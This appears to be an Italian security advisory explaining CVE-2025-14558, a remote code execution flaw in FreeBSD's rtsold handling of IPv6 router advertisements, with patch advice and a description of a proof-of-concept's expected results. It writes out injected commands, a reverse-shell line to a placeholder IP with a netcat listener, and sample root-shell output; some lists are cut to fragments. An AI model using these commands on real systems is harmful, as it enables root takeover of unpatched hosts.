
CVE-2025-14558
CVE-2025-14558 è una vulnerabilità critica di esecuzione remota di codice (RCE) che colpisce i sistemi FreeBSD che utilizzano i servizi di sollecitazione dei router IPv6. Un difetto nella gestione degli input di rete non attendibili consente agli attaccanti di eseguire comandi shell arbitrari.
rtsol(8)rtsold(8)resolvconf(8)Se sfruttata con successo, un attaccante può:
Azioni fortemente raccomandate:
rtsol / rtsold se gli RA IPv6 non sono necessariQualsiasi sistema FreeBSD in ascolto di router advertisement IPv6 su una rete non attendibile è ad alto rischio. Applicare le patch immediatamente o disabilitare i servizi interessati.
Se lo script PoC per CVE-2025-14558 funziona correttamente su un sistema FreeBSD vulnerabile (non patchato, con rtsold in esecuzione e che processa i messaggi RA IPv6):
rtsold viene eseguito come root e chiama /sbin/resolvconf con il dominio malevolo).Per un test semplice come --command "id > /tmp/pwned":
Viene creato un file /tmp/pwned contenente un output simile a:
uid=0(root) gid=0(wheel) groups=0(wheel)
Per --command "touch /tmp/exploit_success":
/tmp/exploit_success.Per una reverse shell come --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1":
Controlla sul target con comandi come:
ls -l /tmp/pwned
cat /tmp/pwned
Lo script restituisce il seguente output:
[+] Sending malicious RA on eth0
[+] Injected command: id > /tmp/pwned
[+] Target must run vulnerable rtsold and process the RA
[+] Done. Check target for execution (e.g. /tmp/pwned)
Per la reverse shell: se ha successo, il tuo nc -lvnp 4444 riceve una connessione e una shell di root:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
bash: cannot set terminal process groups: No job control in this shell
bash: no job control in this shell
root@vulnerable-host:~ #
(Ora hai una shell di root – digita comandi come id, whoami, ecc.)
rtsold non in esecuzione, non sulla stessa rete L2, firewall che blocca gli RA, o IPv6 disabilitato.Questo è osservabile solo in un laboratorio controllato su un sistema FreeBSD vulnerabile (pre-patch del 16 dicembre 2025). Nessun report pubblico di sfruttamento nel mondo reale al 23 dicembre 2025. Applicare le patch immediatamente in produzione.